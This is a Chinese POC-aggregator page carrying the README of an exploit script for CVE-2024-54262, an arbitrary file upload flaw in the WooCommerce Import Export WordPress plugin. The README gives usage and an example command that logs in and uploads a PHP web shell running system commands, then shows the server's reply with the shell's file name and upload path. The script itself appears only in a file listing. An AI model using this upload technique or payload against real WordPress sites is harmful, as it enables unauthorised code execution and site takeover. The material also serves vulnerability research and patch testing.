POC详情: 4d9327821384b028f5de55795934a9eedcec8770

来源
关联漏洞
标题: WordPress plugin Import Export For WooCommerce 代码问题漏洞 (CVE-2024-54262)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Import Export For WooCommerce 1.5版本及之前版本存在代码问题漏洞,该漏洞源于不受限制地上传具有危险类型漏洞的文件。
描述
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
介绍
# CVE-2024-54262
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
# Overview
This script exploits a vulnerability in the "Import Export for WooCommerce" WordPress plugin. The vulnerability allows unauthorized users to upload arbitrary files, leading to potential remote code execution (RCE).

## Features:
- **Version Detection**: Automatically checks if the WordPress site is running a vulnerable plugin version.
- **Authentication**: Supports WordPress login for further exploitation.
- **File Upload**: Allows uploading of malicious PHP files for RCE.

## Prerequisites:

1. Python 3.x
2. Required Python libraries:
   - `requests`
   - `argparse`

Install dependencies using:
```bash
pip install requests
```
3.Ensure the target WordPress site uses the vulnerable version of the plugin.

## Usage:


```
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload
```
### Example:
```
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
```
### Output Explanation

1. **The site is vulnerable.**
   - Indicates that the WordPress site is running a vulnerable plugin version.
2. **Logged in successfully.**
   - Confirms successful login with the provided credentials.
3. ```
   {
       "status": true,
       "code": 104,
       "message": "Success",
       "data": {
           "file_name": "import_manual_1737090262.php",
           "total_requests": 1,
           "import_columns": "all",
           "product_search_type": "SKU",
           "product_operation": "create_new_update_existing",
           "field_separator": ","
       }
   }

   
 - **Shell Name**: `import_manual_1737090262.php`
 - **Shell Path**: `wp-content/uploads/import-export-for-woocommerce/product/`
  
### Disclaimer
This tool is for educational purposes only. The author is not responsible for any misuse or damages caused by this script. Unauthorized access or exploitation of systems without explicit permission is illegal and unethical.

文件快照

[4.0K] /data/pocs/4d9327821384b028f5de55795934a9eedcec8770 ├── [5.8K] CVE-2024-54262.py └── [2.4K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。